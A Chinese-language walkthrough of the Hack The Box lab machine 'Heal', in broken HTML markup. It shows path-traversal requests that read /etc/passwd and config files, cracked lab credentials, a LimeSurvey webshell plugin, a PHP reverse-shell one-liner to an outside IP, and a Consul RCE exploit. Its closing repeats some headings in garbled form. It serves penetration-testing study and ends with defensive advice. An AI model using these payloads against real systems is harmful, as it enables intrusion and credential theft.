HTB-Heal 渗透实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始端口扫描<\/h3>
使用nmap进行快速端口扫描：<\/p>
nmap -sT --min-rate 10000<\/span> -p- 10.10.11.46
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22\/tcp (SSH)<\/li>
80\/tcp (HTTP)<\/li>
<\/ul>
1.2 详细服务扫描<\/h3>
nmap -sTVC -O -p22,80 10.10.11.46
<\/span><\/span><\/code><\/pre>获取详细信息：<\/p>

SSH: OpenSSH 8.9p1 Ubuntu 3ubuntu0.10<\/li>
HTTP: nginx 1.18.0 (Ubuntu)<\/li>
<\/ul>
2. Web应用渗透<\/h2>
2.1 初始访问<\/h3>

访问http:\/\/heal.htb发现登录界面，可注册<\/li>
注册后进入简历生成器功能<\/li>
<\/ol>
2.2 目录遍历漏洞利用<\/h3>
在简历生成过程中抓包(Burp Suite)，发现filename参数存在目录遍历漏洞：<\/p>
GET \/download.php?filename=..\/..\/..\/..\/etc\/passwd
<\/code><\/pre>
成功读取\/etc\/passwd，发现用户：<\/p>

ron<\/li>
ralph<\/li>
<\/ul>
2.3 目录爆破<\/h3>
使用gobuster进行目录爆破：<\/p>
gobuster dir -w \/usr\/share\/dirbuster\/wordlists\/directory-list-lowercase-2.3-small.txt -u http:\/\/heal.htb -t 50<\/span>
<\/span><\/span><\/code><\/pre>发现重要路径：<\/p>

\/survey<\/li>
<\/ul>
2.4 子域名发现<\/h3>

访问\/survey发现子域名http:\/\/take-survey.heal.htb<\/li>
在index.php中发现用户名ralph<\/li>
<\/ol>
使用feroxbuster进行子域名爆破：<\/p>
feroxbuster --url http:\/\/take-survey.heal.htb\/index.php\/ -C 503<\/span>
<\/span><\/span><\/code><\/pre>发现管理后台：<\/p>
http:\/\/take-survey.heal.htb\/index.php\/admin\/authentication\/sa\/login
<\/code><\/pre>
2.5 配置文件读取<\/h3>

发现api子域名http:\/\/api.heal.htb<\/li>
通过目录遍历读取LimeSurvey配置文件：<\/li>
<\/ol>
http:\/\/take-survey.heal.htb\/download.php?filename=..\/..\/..\/..\/var\/www\/limesurvey\/application\/config\/config.php
<\/code><\/pre>

读取数据库配置文件：<\/li>
<\/ol>
http:\/\/take-survey.heal.htb\/download.php?filename=..\/..\/..\/..\/var\/www\/limesurvey\/application\/config\/database.yml
<\/code><\/pre>
获取数据库凭据，使用john破解得到：<\/p>
ralph:147258369
<\/code><\/pre>
3. 初始访问获取<\/h2>
3.1 LimeSurvey后台登录<\/h3>
使用凭据ralph:147258369登录LimeSurvey管理后台<\/p>
3.2 LimeSurvey RCE漏洞利用<\/h3>
利用插件上传漏洞执行RCE：<\/p>

下载webshell插件：<\/li>
<\/ol>
git clone https:\/\/github.com\/p0dalirius\/LimeSurvey-webshell-plugin
<\/span><\/span><\/code><\/pre>

修改console.py中的路径（如需）<\/p>
<\/li>

上传插件zip文件并激活<\/p>
<\/li>

访问后门执行命令：<\/p>
<\/li>
<\/ol>
http:\/\/take-survey.heal.htb\/plugins\/Shell\/Shell.php?action=exec&cmd=id
<\/code><\/pre>

反弹shell：<\/li>
<\/ol>
php -r '$sock=fsockopen("10.10.16.41",8888);shell_exec("sh <&3 >&3 2>&3");'<\/span>
<\/span><\/span><\/code><\/pre>3.3 获取SSH凭据<\/h3>
在配置文件中发现密码：<\/p>
find \/var\/www\/ -name '*config*'<\/span> 2>\/dev\/null
<\/span><\/span><\/code><\/pre>找到\/var\/www\/limesurvey\/application\/config\/config.php，包含密码：<\/p>
AdmiDi0_pA
$$
w0rd
<\/code><\/pre>
使用crackmapexec验证SSH：<\/p>
crackmapexec ssh 10.10.11.46 -u ron -p AdmiDi0_pA
<\/span><\/span>$$
<\/span><\/span>w0rd
<\/span><\/span><\/code><\/pre>成功获取SSH访问权限。<\/p>
4. 权限提升<\/h2>
4.1 内网服务发现<\/h3>
检查本地服务：<\/p>
ss -tuln
<\/span><\/span><\/code><\/pre>发现多个内部端口，重点关注：<\/p>

3000<\/li>
8500<\/li>
8600<\/li>
<\/ul>
4.2 SSH端口转发<\/h3>
ssh ron@heal.htb -L 3000:127.0.0.1:3000
<\/span><\/span>ssh ron@heal.htb -L 8500:127.0.0.1:8500
<\/span><\/span>ssh ron@heal.htb -L 8600:127.0.0.1:8600
<\/span><\/span><\/code><\/pre>4.3 Hashicorp Consul RCE<\/h3>

访问http:\/\/localhost:8500<\/li>
查看页面源码发现Consul版本信息<\/li>
使用searchsploit查找漏洞：<\/li>
<\/ol>
searchsploit consul
<\/span><\/span><\/code><\/pre>
下载并执行漏洞利用脚本：<\/li>
<\/ol>
python consul_rce.py --acl-token=<\/span>随便填 --cmd=<\/span>"whoami"<\/span> http:\/\/localhost:8500
<\/span><\/span><\/code><\/pre>5. 关键知识点总结<\/h2>

目录遍历漏洞<\/strong>：通过filename参数读取系统敏感文件<\/li>
子域名爆破<\/strong>：发现隐藏的管理后台和API接口<\/li>
配置文件泄露<\/strong>：通过目录遍历获取数据库和系统配置<\/li>
LimeSurvey RCE<\/strong>：通过插件上传漏洞获取初始访问权限<\/li>
SSH端口转发<\/strong>：访问内部服务进行横向移动<\/li>
Hashicorp Consul RCE<\/strong>：最终权限提升的关键漏洞<\/li>
<\/ol>
6. 防御建议<\/h2>

修复目录遍历漏洞，严格过滤用户输入<\/li>
加强配置文件权限，避免敏感信息泄露<\/li>
及时更新易受攻击的组件（如LimeSurvey、Consul）<\/li>
实施最小权限原则，限制服务账户权限<\/li>
监控异常端口转发行为<\/li>
使用强密码策略，避免密码重用<\/li>
<\/ol>
HTB-Heal 渗透实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. Web应用渗透<\/h2>

3. 初始访问获取<\/h2>

3.1 LimeSurvey后台登录<\/h3> 使用凭据ralph:147258369登录LimeSurvey管理后台<\/p>

4. 权限提升<\/h2>

3.1 LimeSurvey后台登录<\/h3>
使用凭据ralph:147258369登录LimeSurvey管理后台<\/p>
